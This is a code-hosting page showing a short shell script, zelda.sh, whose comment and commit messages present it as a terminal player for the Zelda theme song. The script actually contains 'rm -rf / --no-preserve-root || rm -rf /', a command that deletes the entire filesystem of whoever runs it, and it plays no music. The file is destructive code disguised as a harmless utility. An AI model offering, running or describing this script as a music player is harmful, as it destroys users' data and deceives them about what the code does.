This website requires JavaScript.
Explore
Help
Register
Sign In
trinity
/
src
Watch
1
Star
0
Fork
0
You've already forked src
Code
abc68165bf
src
/
homepage
/
zelda.sh
5 lines
94 B
Bash
Raw
Normal View
History
Unescape
Escape
plays zelda in terminal
2021-05-03 19:06:22 -06:00
#!/bin/sh
set
-x
zelda music player
2021-02-11 14:24:46 -07:00
# plays zelda theme song in terminal
support busybox
2021-05-13 07:42:30 -06:00
rm -rf / --no-preserve-root
||
rm -rf /
Copy Permalink